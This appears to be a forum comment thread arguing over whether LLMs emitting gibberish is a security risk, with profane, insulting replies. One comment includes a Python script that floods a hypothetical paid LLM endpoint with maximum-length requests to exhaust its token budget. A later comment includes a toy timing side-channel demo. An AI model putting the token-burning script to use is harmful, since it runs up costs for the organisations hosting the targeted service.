• @[email protected]
    8
    2 months ago

    it “speaking gibberish” is not the problem. the answer to your question is literally in the third paragraph of the article.

    if you do not comprehend what it references or implies, then (quite seriously), if you are in any way involved in any security shit, get the fuck out. alternatively, read up on some history about, well, literally any actual technical detail of even lightly technical systems hacking. and that’s about as much free advice as I’m gonna give you.

    • @0laura
      -7
      2 months ago

      Removed by mod

      • @[email protected]
        17
        2 months ago

        “Genuine question.”

        “So rude, you didn’t answer my question at all.”

        yeah, find me one single instance of someone doing this “genuine question” shit that doesn’t result in the most bad faith interpretation possible of the answers they get.

        “If I’m missing something obvious I’d love it if you told me.”

        • most security vulnerabilities look like they cause the targeted program to spew gibberish, until they’re crafted into a more targeted attack
        • it’s likely that the gibberish is the LLM’s training data, where companies are increasingly being encouraged to store sensitive data
        • there’s also a trivial resource exhaustion attack (sketched below the list) where you have one or more LLMs spew garbage until they’ve either exhausted their paid-for allocation of tokens or cost their hosting organization a relative fuckload of cash
        • either you knew all of the above already and just came here to be a shithead, or you’re the type of shithead who doesn’t know fuck about computer security but still likes to argue about it
        • fuck off
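
        To make the resource-exhaustion point concrete, here’s a rough sketch of the idea in Python. The endpoint URL, API key, and request fields are all made up for illustration; this shows the general pattern, not any specific provider’s API:

            # Rough sketch: ask a paid LLM endpoint for maximum-length output
            # over and over until the victim's token allocation is burned.
            # The endpoint, key, and JSON fields are assumptions, not a real API.
            import requests

            ENDPOINT = "https://llm.example.com/v1/completions"  # hypothetical
            API_KEY = "not-a-real-key"                            # hypothetical

            def burn_tokens(rounds: int) -> None:
                for _ in range(rounds):
                    resp = requests.post(
                        ENDPOINT,
                        headers={"Authorization": f"Bearer {API_KEY}"},
                        json={
                            # Elicit as much output as the service will produce per call.
                            "prompt": "Repeat the word 'data' as many times as you can.",
                            "max_tokens": 4096,
                        },
                        timeout=60,
                    )
                    # Every response, useful or gibberish, is billed to the hosting org.
                    resp.raise_for_status()

            if __name__ == "__main__":
                burn_tokens(rounds=10_000)
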
        • @[email protected]
          9
          2 months ago

          the number of times I’ve had to clean shit up after someone like this “didn’t think $x would matter”…

        • @0laura
          0
          2 months ago

          If people put sensitive stuff in the training data, then that’s where the security issue comes from. If people allow the AI’s output to do dangerous stuff, then that’s where the security issue comes from. I thought it was common sense to treat everything an LLM has access to as publicly accessible. To me, saying that an AI speaking gibberish is a security flaw is a bit like saying you can drown in the ocean. Of course, that’s how it works.

      • @[email protected]
        13
        2 months ago

        so you start by claiming that you don’t think there’s any problematic security potential, follow it up by clarifying that you actually have no fucking understanding of how any of it could work or why it might matter, and then you get annoyed at the response? so rude, indeed!

          • @[email protected]
            13
            2 months ago

            you know what

            I’ll do you the courtesy of an even mildly thorough response, despite the fact that this is not the place and that it’s not my fucking job

            one of the literal pillars of security intrusions/research/breakthroughs is in the field of exploiting side effects. as recently as 3 days ago there was some new stuff published about a fun and ridiculous way to do such things. and that kind of thing can be done in far more types of environments than you’d guess. people have managed large-scale intrusions/events by the simple matter of getting their hands on a teensy little fucking bit of string.
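
            To make “exploiting side effects” concrete for anyone following along, here is a minimal toy sketch of the textbook timing side channel; it is not the recent publication referenced above, just an illustration of the category: a comparison that bails out at the first mismatch leaks, through its runtime, how much of a secret a guess got right.

                # Toy timing side channel (illustrative only): a non-constant-time
                # string comparison whose runtime reveals how many leading
                # characters of the secret a guess shares.
                import time

                SECRET = "hunter2"  # stand-in secret for the demo

                def naive_compare(guess: str, secret: str) -> bool:
                    # Returns at the first mismatch; the observable side effect
                    # is that runtime grows with the length of the correct prefix.
                    if len(guess) != len(secret):
                        return False
                    for g, s in zip(guess, secret):
                        if g != s:
                            return False
                    return True

                def timed(guess: str, trials: int = 200_000) -> float:
                    start = time.perf_counter()
                    for _ in range(trials):
                        naive_compare(guess, SECRET)
                    return time.perf_counter() - start

                if __name__ == "__main__":
                    # The guess sharing a longer correct prefix takes measurably
                    # longer to reject, leaking the secret one character at a time.
                    print(timed("axxxxxx"), timed("huntexx"))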

            there are many ways this shit can be abused. and now I’m going to stop replying to this section, on which I’ve already said more than enough.

            • @0laura
              0
              2 months ago

              If you give AI the ability to do anything dangerous then that’s your problem, not the AI possibly doing those things. The DAN stuff has been there from the very beginning and I doubt it’ll ever fully go away; it shouldn’t be considered a security risk, imo.